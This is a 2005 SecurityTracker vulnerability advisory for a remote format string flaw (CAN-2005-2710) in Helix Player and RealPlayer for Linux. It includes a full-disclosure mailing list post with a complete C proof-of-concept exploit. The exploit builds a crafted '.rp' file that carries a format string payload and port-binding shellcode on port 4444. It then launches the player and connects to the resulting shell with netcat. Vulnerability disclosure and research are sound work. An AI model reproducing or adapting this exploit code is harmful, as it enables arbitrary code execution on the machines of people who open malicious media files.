Helix Player Format String Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1014975
|
|
SecurityTracker URL: http://securitytracker.com/id?1014975
|
|
CVE Reference: CAN-2005-2710
(Links to External Site)
|
Updated: Sep 27 2005
|
Original Entry Date: Sep 27 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: A vulnerability was reported in Helix Player. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a specially crafted '.rp' file that, when loaded by the target user, will trigger a format string flaw and
execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
Real Player for
Linux/UNIX is also affected.
c0ntex reported this vulnerability.
|
Impact: A remote user can cause arbitrary code to be executed on the target user's system with the privileges of the target user.
|
Solution: The vendor plans to issue a fixed version (1.0.6). [Editor's note: A source code fix is available via CVS.]
Red Hat has issued a fix for Red Hat Enterprise Linux 4:
https://rhn.redhat.com/errata/RHSA-2005-788.html
|
Vendor URL: www.helixcommunity.org/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any)
|
Reported By: c0ntex <c0ntexb@gmail.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 26 Sep 2005 19:27:32 +0100
From: c0ntex <c0ntexb@gmail.com>
Subject: [Full-disclosure] RealPlayer && HelixPlayer Remote Format String
|
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";
int
filegen(char *shellcode)
FILE *rp;
printf("[-] Creating file [%s]\n", filename);
rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
free(shellcode);
return(EXIT_FAILURE);
}
printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with
value [%d]\n", STACKPOP, EBPMSB);
fprintf(rp,
"<imfl>\n"
"<head\n"
"duration=\"1:33.7\"\n"
"timeformat=\"dd:hh:mm:ss.xyz\"\n"
"preroll=\"1:33.7\"\n"
"bitrate=\"1337\"\n"
"width=\"69\"\n"
"height=\"69\"\n"
"aspect=\"\"\n"
"url=\"http://www.open-security.org\"/>\n"
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>
\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"
2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);
free(shellcode); shellcode = NULL;
return(EXIT_SUCCESS);
int
main(int argc, char **argv)
char *shellcode = NULL;
puts("\nRemote format string exploit POC for UNIX RealPlayer &&
HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's
latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
return(EXIT_FAILURE);
}
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';
filegen(shellcode);
puts("[-] Completed creation of test file!\n[-] Executing
RealPlayer now...");
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... :(");
return(EXIT_FAILURE);
}
}
puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO
HIT RETURN ON REALPLAYER WINDOW **");
sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
--
regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
